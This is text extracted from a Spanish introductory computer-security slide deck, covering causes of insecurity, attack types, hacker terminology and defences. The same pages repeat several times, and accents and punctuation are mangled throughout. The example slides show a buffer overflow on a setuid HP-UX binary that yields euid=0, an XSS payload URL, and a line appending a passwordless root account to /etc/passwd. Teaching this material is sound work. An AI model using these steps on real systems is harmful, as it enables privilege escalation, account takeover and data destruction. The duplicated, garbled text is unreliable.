Page 8: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

Virus

lthttpworldmapf-securecomgtlthttpwwwf-securecomvirus-infostatisticsgt

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 9: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Origen de internet Abierta cooperativa

bull Web Acceso masivo a personas sin conocimientos (deseable pero peligroso)

bull Nodos no administrados

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En Internet

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 10: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Crecimiento desordenado a medida que surgen necesidades yo recursos

bull Falta de planificacioacuten inicial

bull Las mismas que la inseguridad en ordenadores

Razones de la inseguridad

En redes

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 11: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

bull Facilitar al maacuteximo todo al usuario automatizacioacuten Seguridad vs Comodidad

bull Complejidad de los sistemas interacciones no previstas

bull Sistemas ldquodistribuidosrdquo

bull Desconocimiento en temas de seguridad por parte de los programadores

Razones de la inseguridad

En ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

bull LocalRemoto rarr impreciso

bull Remoto anoacutenimo

bull Remoto autentificado

bull Local autentificado

bull Local anoacutenimo

Tipos de problemas

Por el origen del acceso

bull Interno

bull Externo

bull Automaacutetico

bull Automaacutetico autoacutenomo

Tipos de problemas

Por el atacante

bull Ataques ldquopersonalesrdquo para controlar determinados recursos concretos

bull Ataques aleatorios para usar recursos como puente Uso de recursos de disco

bull Ataques automaacuteticos para realizar DoS distribuidos o bots de IRC

bull Ataques automaacuteticos sin objetivo particular Gusanos

bull Gusanos que buscan salidas de ldquospamrdquo

bull Ataques tipo ldquophisingrdquo para robo de datos bancarios

bull Creacion de redes de ldquozombiesrdquo para enviacuteo masivo de spamphising

bull Virus orientados al robo de datos bancarios

Evolucioacuten

bull El mundo estaacute lleno de problemas fascinantes esperando a ser resueltos

bull Jamaacutes se deberiacutea resolver un problema dos veces

bull El trabajo aburrido y repetitivo es malo

bull La libertad es buena

bull La actitud no es sustituto de la competencia

Tipos de usuarios

httpwwwcatborg~esrhacker-emblem

Hacker

bull Nerd

bull Geek

bull Luser

bull Wannabe

bull Crackers

bull Script-kiddies

Tipos de usuarios

httpwwwjargonorg

Otros

bull Ingleacutes

bull Programacioacuten (teoriacutea)

bull Lenguajes de alto nivel (SO - C)

bull Ensamblador (varios)

bull Manejo de sistemas operativos (niveles usuario programador y administrador)

bull Conocimiento de protocolos de comunicaciones

bull Conocimiento de aplicaciones tiacutepicas

bull Estudio de los fallos ya publicados

Conceptos baacutesicos

bull Cesioacuten de privilegios indiscriminada

bull Variables de entorno

bull Enlaces simboacutelicos

bull Condiciones de carrera

bull Desbordamiento

bull Relaciones de confianza

Conceptos baacutesicos

Fallos tiacutepicos en Sistemas Operativos

bull Automatizacioacuten excesiva Ejecucioacuten automaacutetica de aplicaciones locales con datos externos

bull Ejecucioacuten automaacutetica de coacutedigo externo Scripts incluidos en todo tipo de documentos (Ofimaacutetica HTML e-mail)

bull Aumento de importancia por el incremento de servicios viacutea Web XSSCSS

Conceptos baacutesicos

Fallos tiacutepicos en clientes

bull Conocimiento del sistema

bull Verificacioacuten de integridad

bull Protocolos cifrados

bull Revisioacuten de registros (rdquologsrdquo)

bull Paranoia Evitar ejecucioacuten de coacutedigo externo Aplicaciones ldquosegurasrdquo

Medidas de seguridad

A nivel de usuario

bull Passwords seguros

Medidas de seguridad

A nivel de usuario

lthttpwwwdilbertcomgt

bull Sistemas con niveles de acceso Trabajar sin privilegios especiales (pe MacOS X)

bull Eliminar servicios (pe SNMP)

bull Reglas de acceso Cortafuegos

bull Actualizaciones del sistema

bull Programacioacuten segura

Medidas de seguridad

A nivel de usuario

Medidas de seguridad

bull Control de acceso externo

bull Limita alcance de problemas de seguridad en serviciosredes locales

bull Limita la posibilidad de utilizar sistemas comprometidos para atacar a terceros

bull Limita la posibilidad de extraer informacioacuten

Cortafuegos (A Favor)

Medidas de seguridad

bull Dificultad de configuracioacuten correcta

bull Dificultad de instalacioacuten de nuevos servicios

bull Problemas con protocolos que usan puertos aleatorios

bull Ralentizacioacuten

bull Importancia relativa en maacutequinas sin servicios y con accesos controlados

Cortafuegos (En Contra)

bull Poliacuteticas de seguridad

bull Disentildeo estricto de la red y los servicios

bull Barreras de acceso

bull Copias de seguridad recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

bull Recuperacioacuten ante desastres

Medidas de seguridad

A nivel de administracioacuten

lthttpwwwdilbertcomgt

bull Configuracioacuten correcta de la red

bull Cifrado de las comunicaciones

bull Protocolos seguros de autentificacioacuten

bull Medidas preventivas

bull Trampas (rdquoHoneypotsrdquo)

bull Departamento legal Registros LSSI

Medidas de seguridad

A nivel de administracioacuten

Ejemplos

$ uname -aHP-UX example B1020 D 9000802 1465633362 64-user license$ ls -l `which disqcp`-r-sr-xr-x 1 root sys 28738 Jan 15 1998 usrlocalbindisqcp$ disqcp devdskdisquete0`perl -e print A x 2237` barMemory fault$ cp `which disqcp` dcp$ dcp devdskdisquete0`perl -e print A x 3237` bar$ gdb dcp core(no debugging symbols found)0 0x41414140 in ()$ f iduid=9220(foo) gid=612(foobar) euid=0(root)

Ejemplos

bull Servidor Web interno

bull httpxerox_dc_470examplecombull GET -gt The request had invalid syntax

bull GET dataconfigmicrosrvcfg

lthttpwwwsecurityfocuscomarchive1348092gt

Dispositivos

Ejemplos

httpwwwexamplecom9192plsgerentepckUtilidadgyda_errormensajeError=3CIMG20SRC=22httpwwwextractandocomentretenimientoimageSchiffer_11ajpg223E3Cscript3Ealert(22Hola22)3Cscript3E

XSS

bull Disentildeo poco seguro (pe Share W98)

bull Configuraciones abiertas por defecto (pe Impresoras)

bull Formas de uso no previstas (sendmail)

bull Validacioacuten de los datos de entrada (chsh)

bull Errores de programacioacuten

Ejemplos

Ejemplos

bull Windows 2000 SP2

bull Moviemientos ldquoautoacutenomosrdquo de ventanas

bull Conexioacuten con IP extrantildea (netstat)

bull Instalacioacuten de puertas traseras

bull Informe a organismos relevantes (CERT)

Intrusioacuten

bull Web

bull news

bull Listas de correo (pe securityfocus)

bull Avisos de seguridad del fabricante

Recursos

Memory faultrootlocalhost echo ldquocracker00Te he pilladobinshrdquo gtgt etcpasswd rootlocalhost iduid=0(root) gid=0(root)rootlocalhost borrado el disco duro5090100Adios

Page 12: Una Introducción a la Seguridad en Sistemas Informáticosvirtual.usalesiana.edu.bo/web/conte/archivos/516.pdf · 4. En usuarios 4. Consecuencias de la inseguridad 1. Sobre los ordenadores

bull Instalaciones ldquopor defectordquo no pensadas para la seguridad

Razones de la inseguridad

En ordenadores

lthttpwwwtiraecolnetgt

Razones de la inseguridad

bull Renuncia por parte de los usuarios a aprender como funcionan las cosas

bull Credibilidad y buena voluntad del usuario

bull Falta de concienciacioacuten

En usuarios

bull Denegacioacuten de servicio

bull Eliminacioacuten de evidencias

bull Ejecucioacuten no permitida

bull Acceso a datos ajenos

bull Modificacioacuten de datos ajenos

bull Ejecucioacuten arbitraria

bull Control total

Consecuencias

Sobre los ordenadores

Consecuencias

bull Peacuterdida de tiempo sistemas maacutes lentos

bull Peacuterdida de trabajo (datos)

bull Peacuterdidas econoacutemicas (robos)

bull Coste de proteccioacuten y reparacioacuten

bull Deterioro de sistemas vitales

Sobre los usuarios

bull Eric Knight lthttpwwwussrbackcomdocspapersgeneralcompvuln_draftpdfgt

Tipos de problemas

bull Ingenieriacutea social

bull Cooperacioacuten del usuario (troyanos virus)

bull Interaccioacuten con el usuario (software ldquoPhisingrdquo)

bull Autoacutenomos

Tipos de problemas

Por el meacutetodo de acceso

